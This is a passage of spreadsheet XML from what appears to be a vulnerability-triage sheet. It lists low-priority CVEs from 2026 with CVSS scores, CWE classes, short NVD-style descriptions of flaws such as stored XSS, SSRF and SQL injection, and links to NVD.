r="I2185" s="5" t="inlineStr" /><c r="J2185" s="5" t="inlineStr"><is><t>fortinet</t></is></c><c r="K2185" s="5" t="inlineStr" /><c r="L2185" s="5" t="inlineStr" /><c r="M2185" s="5" t="inlineStr" /><c r="N2185" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2185" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2185" s="5" t="inlineStr" /><c r="Q2185" s="5" t="inlineStr"><is><t>CWE-283</t></is></c><c r="R2185" s="5" t="inlineStr"><is><t>A unverified ownership vulnerability in Fortinet FortiClientWindows 7.4.0 through 7.4.7, FortiClientWindows 7.2 all versions may allow attacker to improper access control via &lt;insert attack vector here&gt;</t></is></c><c r="S2185" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84386</t></is></c></row><row r="2186"><c r="A2186" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2186" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2186" s="5" t="inlineStr"><is><t>CVE-2026-84477</t></is></c><c r="D2186" s="5" t="n"><v>5.1</v></c><c r="E2186" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2186" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G2186" s="5" t="inlineStr" /><c r="H2186" s="5" t="n"><v>0.002</v></c><c r="I2186" s="5" t="inlineStr" /><c r="J2186" s="5" t="inlineStr" /><c r="K2186" s="5" t="inlineStr" /><c r="L2186" s="5" t="inlineStr" /><c r="M2186" s="5" t="inlineStr" /><c r="N2186" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2186" s="5" t="inlineStr"><is><t>2026-09-01</t></is></c><c r="P2186" s="5" t="inlineStr" /><c r="Q2186" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R2186" s="5" t="inlineStr"><is><t>AVideo Live_schedule::setTitle() and setDescription() store POST input without sanitization, allowing users with streaming permission to inject malicious scripts. Unauthenticated attackers can access remindMe.php to execute stored XSS payloads in victim browsers without requiring authentication.</t></is></c><c r="S2186" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84477</t></is></c></row><row r="2187"><c r="A2187" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2187" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2187" s="5" t="inlineStr"><is><t>CVE-2026-85599</t></is></c><c r="D2187" s="5" t="n"><v>5.1</v></c><c r="E2187" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2187" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G2187" s="5" t="inlineStr" /><c r="H2187" s="5" t="n"><v>0.002</v></c><c r="I2187" s="5" t="inlineStr" /><c r="J2187" s="5" t="inlineStr" /><c r="K2187" s="5" t="inlineStr" /><c r="L2187" s="5" t="inlineStr" /><c r="M2187" s="5" t="inlineStr" /><c r="N2187" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2187" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P2187" s="5" t="inlineStr" /><c r="Q2187" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R2187" s="5" t="inlineStr"><is><t>Grav Shortcode Core before 6.2.5 contains stored cross-site scripting vulnerabilities in the [lorem] tag parameter and [details] summary parameter that are written to rendered pages without escaping. Attackers with page-edit access can inject arbitrary HTML and JavaScript that executes in the browsers of all page visitors, including administrators.</t></is></c><c r="S2187" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85599</t></is></c></row><row r="2188"><c r="A2188" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2188" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2188" s="5" t="inlineStr"><is><t>CVE-2026-85600</t></is></c><c r="D2188" s="5" t="n"><v>5.1</v></c><c r="E2188" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2188" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G2188" s="5" t="inlineStr" /><c r="H2188" s="5" t="n"><v>0.002</v></c><c r="I2188" s="5" t="inlineStr" /><c r="J2188" s="5" t="inlineStr" /><c r="K2188" s="5" t="inlineStr" /><c r="L2188" s="5" t="inlineStr" /><c r="M2188" s="5" t="inlineStr" /><c r="N2188" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2188" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P2188" s="5" t="inlineStr" /><c r="Q2188" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R2188" s="5" t="inlineStr"><is><t>Grav Admin (getgrav/grav-plugin-admin2) versions &lt;= 2.0.19 contain a stored cross-site scripting vulnerability in the tHtml() function (src/lib/stores/i18n.svelte.ts), which substitutes untrusted parameters such as usernames into translation templates before parsing the result as markdown. Grav's server-side username validation (DataUser::isValidUsername) blocks filesystem-dangerous characters but not &lt;, &gt;, ", or ', allowing an attacker to register a username containing an HTML payload. When an administrator views a UI surface that renders the username through tHtml()—such as the two-factor force-disable confirmation prompt or the 'page is locked' editor notice—the payload executes in their authenticated session. Fixed in 2.0.21.</t></is></c><c r="S2188" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85600</t></is></c></row><row r="2189"><c r="A2189" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2189" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2189" s="5" t="inlineStr"><is><t>CVE-2026-85781</t></is></c><c r="D2189" s="5" t="n"><v>5.1</v></c><c r="E2189" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2189" s="5" t="inlineStr"><is><t>ff89ba41-3aa1-4d27-914a-91399e9639e5</t></is></c><c r="G2189" s="5" t="inlineStr" /><c r="H2189" s="5" t="n"><v>0.003</v></c><c r="I2189" s="5" t="inlineStr" /><c r="J2189" s="5" t="inlineStr"><is><t>kubernetes</t></is></c><c r="K2189" s="5" t="inlineStr" /><c r="L2189" s="5" t="inlineStr" /><c r="M2189" s="5" t="inlineStr" /><c r="N2189" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2189" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P2189" s="5" t="inlineStr" /><c r="Q2189" s="5" t="inlineStr"><is><t>CWE-283</t></is></c><c r="R2189" s="5" t="inlineStr"><is><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is></c><c r="S2189" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85781</t></is></c></row><row r="2190"><c r="A2190" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2190" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2190" s="5" t="inlineStr"><is><t>CVE-2026-86516</t></is></c><c r="D2190" s="5" t="n"><v>5.1</v></c><c r="E2190" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2190" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G2190" s="5" t="inlineStr" /><c r="H2190" s="5" t="n"><v>0.002</v></c><c r="I2190" s="5" t="inlineStr" /><c r="J2190" s="5" t="inlineStr" /><c r="K2190" s="5" t="inlineStr" /><c r="L2190" s="5" t="inlineStr" /><c r="M2190" s="5" t="inlineStr" /><c r="N2190" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2190" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2190" s="5" t="inlineStr" /><c r="Q2190" s="5" t="inlineStr"><is><t>CWE-266, CWE-269</t></is></c><c r="R2190" s="5" t="inlineStr"><is><t>A vulnerability was detected in elenavanengelenmaslova mocknest-serverless 0.9.0. The affected element is an unknown function of the file deployment/aws/shared/github-oidc-role.yaml of the component AWS GitHub OIDC Deployment Helper Script. Performing a manipulation results in improper privilege management. It is possible to initiate the attack remotely. The patch is named 6ab3147282d867c1993f995272750db091c2290b. Applying a patch is the recommended action to fix this issue.</t></is></c><c r="S2190" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86516</t></is></c></row><row r="2191"><c r="A2191" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2191" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2191" s="5" t="inlineStr"><is><t>CVE-2026-18238</t></is></c><c r="D2191" s="5" t="n"><v>5</v></c><c r="E2191" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2191" s="5" t="inlineStr"><is><t>security@tcpdump.org</t></is></c><c r="G2191" s="5" t="inlineStr" /><c r="H2191" s="5" t="n"><v>0.002</v></c><c r="I2191" s="5" t="inlineStr" /><c r="J2191" s="5" t="inlineStr" /><c r="K2191" s="5" t="inlineStr" /><c r="L2191" s="5" t="inlineStr" /><c r="M2191" s="5" t="inlineStr" /><c r="N2191" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2191" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P2191" s="5" t="inlineStr" /><c r="Q2191" s="5" t="inlineStr"><is><t>CWE-126, CWE-1288</t></is></c><c r="R2191" s="5" t="inlineStr"><is><t>The rpcap client code that processes a RPCAP_MSG_PACKET message received from the server incorrectly validates its headers.  A malicious server can send a crafted message and cause the client to treat up to 20 bytes of the client process memory beyond the end of the buffer as if it was a part of the captured packet.</t></is></c><c r="S2191" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-18238</t></is></c></row><row r="2192"><c r="A2192" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2192" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2192" s="5" t="inlineStr"><is><t>CVE-2026-4361</t></is></c><c r="D2192" s="5" t="n"><v>5</v></c><c r="E2192" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2192" s="5" t="inlineStr"><is><t>security@wordfence.com</t></is></c><c r="G2192" s="5" t="inlineStr" /><c r="H2192" s="5" t="n"><v>0.003</v></c><c r="I2192" s="5" t="inlineStr" /><c r="J2192" s="5" t="inlineStr" /><c r="K2192" s="5" t="inlineStr" /><c r="L2192" s="5" t="inlineStr" /><c r="M2192" s="5" t="inlineStr" /><c r="N2192" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2192" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P2192" s="5" t="inlineStr" /><c r="Q2192" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="R2192" s="5" t="inlineStr"><is><t>The Divi theme for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 4.27.6. This is due to the `et_pb_set_video_oembed_thumbnail_resolution()` function using `wp_remote_get()` instead of `wp_safe_remote_get()` to fetch a remote image URL, which does not restrict requests to private or reserved IP ranges. This makes it possible for authenticated attackers, with Contributor-level access and above, to make web requests to arbitrary locations originating from the web application server. The response body is not returned to the attacker (blind SSRF), but two oracles exist: a status oracle (the returned URL string differs depending on whether the target responded with HTTP 200) and a timing oracle (response time varies by target reachability).</t></is></c><c r="S2192" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-4361</t></is></c></row><row r="2193"><c r="A2193" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2193" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2193" s="5" t="inlineStr"><is><t>CVE-2026-72976</t></is></c><c r="D2193" s="5" t="n"><v>5</v></c><c r="E2193" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2193" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G2193" s="5" t="inlineStr" /><c r="H2193" s="5" t="n"><v>0.004</v></c><c r="I2193" s="5" t="inlineStr" /><c r="J2193" s="5" t="inlineStr" /><c r="K2193" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L2193" s="5" t="inlineStr" /><c r="M2193" s="5" t="inlineStr" /><c r="N2193" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2193" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2193" s="5" t="inlineStr" /><c r="Q2193" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R2193" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office Word allows an authorized attacker to disclose information locally.</t></is></c><c r="S2193" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72976</t></is></c></row><row r="2194"><c r="A2194" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2194" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2194" s="5" t="inlineStr"><is><t>CVE-2026-78635</t></is></c><c r="D2194" s="5" t="n"><v>5</v></c><c r="E2194" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2194" s="5" t="inlineStr"><is><t>psirt@okta.com</t></is></c><c r="G2194" s="5" t="inlineStr" /><c r="H2194" s="5" t="n"><v>0.002</v></c><c r="I2194" s="5" t="inlineStr" /><c r="J2194" s="5" t="inlineStr"><is><t>okta</t></is></c><c r="K2194" s="5" t="inlineStr" /><c r="L2194" s="5" t="inlineStr" /><c r="M2194" s="5" t="inlineStr" /><c r="N2194" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2194" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2194" s="5" t="inlineStr" /><c r="Q2194" s="5" t="inlineStr"><is><t>CWE-88</t></is></c><c r="R2194" s="5" t="inlineStr"><is><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is></c><c r="S2194" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78635</t></is></c></row><row r="2195"><c r="A2195" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2195" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2195" s="5" t="inlineStr"><is><t>CVE-2026-79904</t></is></c><c r="D2195" s="5" t="n"><v>5</v></c><c r="E2195" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2195" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G2195" s="5" t="inlineStr" /><c r="H2195" s="5" t="n"><v>0.001</v></c><c r="I2195" s="5" t="inlineStr" /><c r="J2195" s="5" t="inlineStr" /><c r="K2195" s="5" t="inlineStr"><is><t>adobe:photoshop_mobile</t></is></c><c r="L2195" s="5" t="inlineStr" /><c r="M2195" s="5" t="inlineStr" /><c r="N2195" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2195" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2195" s="5" t="inlineStr" /><c r="Q2195" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="R2195" s="5" t="inlineStr"><is><t>Photoshop Mobile is affected by an Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability that could result in a Security feature bypass. A low-privileged attacker could leverage this vulnerability to access unauthorized files or directories outside the intended restrictions. Exploit depends on conditions beyond the attacker's control. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="S2195" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79904</t></is></c></row><row r="2196"><c r="A2196" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2196" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2196" s="5" t="inlineStr"><is><t>CVE-2026-86735</t></is></c><c r="D2196" s="5" t="n"><v>5</v></c><c r="E2196" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2196" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G2196" s="5" t="inlineStr" /><c r="H2196" s="5" t="n"><v>0.002</v></c><c r="I2196" s="5" t="inlineStr" /><c r="J2196" s="5" t="inlineStr" /><c r="K2196" s="5" t="inlineStr"><is><t>snipeitapp:snipe-it</t></is></c><c r="L2196" s="5" t="inlineStr" /><c r="M2196" s="5" t="inlineStr" /><c r="N2196" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2196" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2196" s="5" t="inlineStr" /><c r="Q2196" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="R2196" s="5" t="inlineStr"><is><t>snipe-it versions before 8.7.0 contain a server-side request forgery vulnerability in the ExternalUrl validation rule that fails to detect IPv6 transition addresses encoding private IPv4 targets. Attackers with super-admin privileges can configure webhook URLs using NAT64, 6to4, or Teredo transition addresses to bypass SSRF guards and access internal services or cloud metadata endpoints.</t></is></c><c r="S2196" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86735</t></is></c></row><row r="2197"><c r="A2197" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2197" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2197" s="5" t="inlineStr"><is><t>CVE-2026-16693</t></is></c><c r="D2197" s="5" t="n"><v>4.9</v></c><c r="E2197" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2197" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G2197" s="5" t="inlineStr" /><c r="H2197" s="5" t="n"><v>0.001</v></c><c r="I2197" s="5" t="inlineStr" /><c r="J2197" s="5" t="inlineStr" /><c r="K2197" s="5" t="inlineStr"><is><t>ibm:i</t></is></c><c r="L2197" s="5" t="inlineStr" /><c r="M2197" s="5" t="inlineStr" /><c r="N2197" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2197" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P2197" s="5" t="inlineStr" /><c r="Q2197" s="5" t="inlineStr"><is><t>CWE-327</t></is></c><c r="R2197" s="5" t="inlineStr"><is><t>IBM i 7.6, 7.5, 7.4, and 7.3 could allow a remote authenticated attacker to obtain sensitive information due to the use of hardcoded cryptographic constants to obfuscate encryption keys.</t></is></c><c r="S2197" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-16693</t></is></c></row><row r="2198"><c r="A2198" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2198" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2198" s="5" t="inlineStr"><is><t>CVE-2026-22575</t></is></c><c r="D2198" s="5" t="n"><v>4.9</v></c><c r="E2198" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2198" s="5" t="inlineStr"><is><t>psirt@fortinet.com</t></is></c><c r="G2198" s="5" t="inlineStr" /><c r="H2198" s="5" t="n"><v>0.002</v></c><c r="I2198" s="5" t="inlineStr" /><c r="J2198" s="5" t="inlineStr"><is><t>fortinet</t></is></c><c r="K2198" s="5" t="inlineStr" /><c r="L2198" s="5" t="inlineStr" /><c r="M2198" s="5" t="inlineStr" /><c r="N2198" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2198" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2198" s="5" t="inlineStr" /><c r="Q2198" s="5" t="inlineStr"><is><t>CWE-284</t></is></c><c r="R2198" s="5" t="inlineStr"><is><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is></c><c r="S2198" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-22575</t></is></c></row><row r="2199"><c r="A2199" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2199" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2199" s="5" t="inlineStr"><is><t>CVE-2026-53756</t></is></c><c r="D2199" s="5" t="n"><v>4.9</v></c><c r="E2199" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2199" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G2199" s="5" t="inlineStr" /><c r="H2199" s="5" t="n"><v>0.003</v></c><c r="I2199" s="5" t="inlineStr" /><c r="J2199" s="5" t="inlineStr" /><c r="K2199" s="5" t="inlineStr" /><c r="L2199" s="5" t="inlineStr" /><c r="M2199" s="5" t="inlineStr" /><c r="N2199" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2199" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P2199" s="5" t="inlineStr" /><c r="Q2199" s="5" t="inlineStr"><is><t>CWE-89</t></is></c><c r="R2199" s="5" t="inlineStr"><is><t>Emlog is an open source website building system. Prior to version 2.6.16, Emlog CMS Pro contains a blind SQL injection in User_Model::getUserDataByLogin(). The $account parameter is directly interpolated into SQL queries without any filtering. The vulnerability is reachable through the auth cookie validation path, where $username is extracted from the cookie and passed unfiltered into SQL — guarded only by an HMAC signature that requires AUTH_KEY to forge. This issue has been patched in version 2.6.16.</t></is></c><c r="S2199" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-53756</t></is></c></row><row r="2200"><c r="A2200" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2200" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2200" s="5" t="inlineStr"><is><t>CVE-2026-68785</t></is></c><c r="D2200" s="5" t="n"><v>4.9</v></c><c r="E2200" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2200" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G2200" s="5" t="inlineStr" /><c r="H2200" s="5" t="n"><v>0.008</v></c><c r="I2200" s="5" t="inlineStr" /><c r="J2200" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K2200" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L2200" s="5" t="inlineStr" /><c r="M2200" s="5" t="inlineStr" /><c r="N2200" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2200" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2200" s="5" t="inlineStr" /><c r="Q2200" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R2200" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t></is></c><c r="S2200" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68785</t></is></c></row><row r="2201"><c r="A2201" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2201" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2201" s="5" t="inlineStr"><is><t>CVE-2026-78624</t></is></c><c r="D2201" s="5" t="n"><v>4.9</v></c><c r="E2201" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2201" s="5" t="inlineStr"><is><t>psirt@okta.com</t></is></c><c r="G2201" s="5" t="inlineStr" /><c r="H2201" s="5" t="n"><v>0.004</v></c><c r="I2201" s="5" t="inlineStr" /><c r="J2201" s="5" t="inlineStr"><is><t>okta</t></is></c><c r="K2201" s="5" t="inlineStr" /><c r="L2201" s="5" t="inlineStr" /><c r="M2201" s="5" t="inlineStr" /><c r="N2201" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2201" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2201" s="5" t="inlineStr" /><c r="Q2201" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="R2201" s="5" t="inlineStr"><is><t>The Okta Access Gateway backup restore function does not validate the filename embedded in an encrypted backup payload. This results in writing file contents to unintended locations on the appliance filesystem.</t></is></c><c r="S2201" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78624</t></is></c></row><row r="2202"><c r="A2202" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2202" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2202" s="5" t="inlineStr"><is><t>CVE-2026-84901</t></is></c><c r="D2202" s="5" t="n"><v>4.9</v></c><c r="E2202" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2202" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G2202" s="5" t="inlineStr" /><c r="H2202" s="5" t="n"><v>0.002</v></c><c r="I2202" s="5" t="inlineStr" /><c r="J2202" s="5" t="inlineStr" /><c r="K2202" s="5" t="inlineStr" /><c r="L2202" s="5" t="inlineStr" /><c r="M2202" s="5" t="inlineStr" /><c r="N2202" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2202" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P2202" s="5" t="inlineStr" /><c r="Q2202" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="R2202" s="5" t="inlineStr"><is><t>The Eventin  WordPress plugin before 4.1.22 does not properly check authorization on several of its event-management REST routes, allowing users with contributor-level access and above to change the site's front-page setting to an event they do not own and to create, edit and delete global event and speaker taxonomy terms they should not be able to manage.</t></is></c><c r="S2202" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84901</t></is></c></row><row r="2203"><c r="A2203" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2203" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2203" s="5" t="inlineStr"><is><t>CVE-2026-86085</t></is></c><c r="D2203" s="5" t="n"><v>4.9</v></c><c r="E2203" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2203" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G2203" s="5" t="inlineStr" /><c r="H2203" s="5" t="n"><v>0.003</v></c><c r="I2203" s="5" t="inlineStr" /><c r="J2203" s="5" t="inlineStr" /><c r="K2203" s="5" t="inlineStr"><is><t>n8n:n8n</t></is></c><c r="L2203" s="5" t="inlineStr" /><c r="M2203" s="5" t="inlineStr" /><c r="N2203" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2203" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2203" s="5" t="inlineStr" /><c r="Q2203" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="R2203" s="5" t="inlineStr"><is><t>n8n is an open source workflow automation platform. Prior to 2.37.7 and 2.38.2, the /rest/roles/:slug/assignments and /rest/roles/:slug/assignments/:projectId/members endpoints checked only whether the caller could manage the role type. A caller with role:manageProject could name a project the caller could not list and obtain member names and email addresses. The affected controller is packages/cli/src/controllers/role.controller.ts, which omitted the project:list scope check. This issue is fixed in versions 2.37.7 and 2.38.2.</t></is></c><c r="S2203" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86085</t></is></c></row><row r="2204"><c r="A2204" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2204" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2204" s="5" t="inlineStr"><is><t>CVE-2026-86993</t></is></c><c r="D2204" s="5" t="n"><v>4.9</v></c><c r="E2204" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2204" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G2204" s="5" t="inlineStr" /><c r="H2204" s="5" t="n"><v>0.003</v></c><c r="I2204" s="5" t="inlineStr" /><c r="J2204" s="5" t="inlineStr" /><c r="K2204" s="5" t="inlineStr"><is><t>n8n:n8n</t></is></c><c r="L2204" s="5" t="inlineStr" /><c r="M2204" s="5" t="inlineStr" /><c r="N2204" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2204" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2204" s="5" t="inlineStr" /><c r="Q2204" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="R2204" s="5" t="inlineStr"><is><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is></c><c r="S2204" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86993</t></is></c></row><row r="2205"><c r="A2205" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2205" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2205" s="5" t="inlineStr"><is><t>CVE-2021-48006</t></is></c><c r="D2205" s="5" t="n"><v>4.8</v></c><c r="E2205" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2205" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G2205" s="5" t="inlineStr" /><c r="H2205" s="5" t="n"><v>0.001</v></c><c r="I2205" s="5" t="inlineStr" /><c r="J2205" s="5" t="inlineStr" /><c r="K2205" s="5" t="inlineStr" /><c r="L2205" s="5" t="inlineStr" /><c r="M2205" s="5" t="inlineStr" /><c r="N2205" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2205" s="5" t="inlineStr"><is><t>2026-09-06</t></is></c><c r="P2205" s="5" t="inlineStr" /><c r="Q2205" s="5" t="inlineStr"><is><t>CWE-178</t></is></c><c r="R2205" s="5" t="inlineStr"><is><t>PocketMine-MP before 4.0.3 does not perform case-insensitive matching when removing operator entries from ops.txt. The removeOp function lowercases the supplied name but only removes an exactly matching entry, so an operator name stored with non-lowercase letters cannot be revoked using the deop command, leaving the player as an operator until the entry is removed from ops.txt manually.</t></is></c><c r="S2205" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2021-48006</t></is></c></row><row r="2206"><c r="A2206" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2206" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2206" s="5" t="inlineStr"><is><t>CVE-2026-18986</t></is></c><c r="D2206" s="5" t="n"><v>4.8</v></c><c r="E2206" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2206" s="5" 